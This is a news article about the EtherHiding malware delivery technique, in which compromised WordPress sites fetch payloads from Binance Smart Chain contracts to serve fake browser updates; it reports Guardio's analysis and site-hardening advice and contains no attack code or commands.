Cybercriminals have invented a new way to distribute malicious code. The technique, codenamed EtherHiding, targets WordPress vulnerabilities and leverages Binance Smart Chain contracts to conceal parts of malicious payloads delivered through fake browser updates. The threat was identified and extensively analyzed by Guardio, a cybersecurity research company.
The new attack vector is the latest iteration of the "ClearFake" campaign first described by Randy McEoin. The method targets compromised WordPress sites, exploiting vulnerable plugins, outdated CMS versions, or using stolen credentials bought on the dark web. Attackers inject hidden JavaScript code into article pages to enable retrieving a second-stage payload from a server they control.
Using the malicious code, attackers are able to remotely control the defaced website, modify the infection process, and display any content they want, including bogus browser update notifications that serve as a vehicle for distributing malware. They can also change tactics, update blocked domains, and replace detected payloads without having to re-access the WordPress sites.
In the initial attacks, the second-stage code was hosted on Cloudflare Workers, but CloudFlare blocked these accounts, potentially disrupting the campaign. In the evolution of "ClearFake," cybercriminals have developed a new method for hosting malicious code anonymously and without any risk of being blocked – a sort of bullet-proof hosting facilitated by the Binance Smart Chain Blockchain.
This approach allows hackers to tweak the attack process by leveraging Binance's SDK eth_call method on the blockchain to fetch the malicious JavaScript code. Using the eth_call method is a costless operation, originally designed to simulate smart contract execution for read-only or testing purposes without any "external" impact. The action is not recorded on the chain, so criminals can distribute malicious payloads, avoiding any risk of being tracked.
The EtherHiding method makes takedowns difficult and lets criminals get away unpunished – being illustrative of the legal challenges related to decentralized technologies. "A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims," Guardio authors explain.
"To protect your site and, eventually, all your visitors, you should always keep your WordPress infra and plugins updated, safeguarding credentials, using robust, periodically-changed passwords and just keeping an eye on what is happening in your site," they suggest.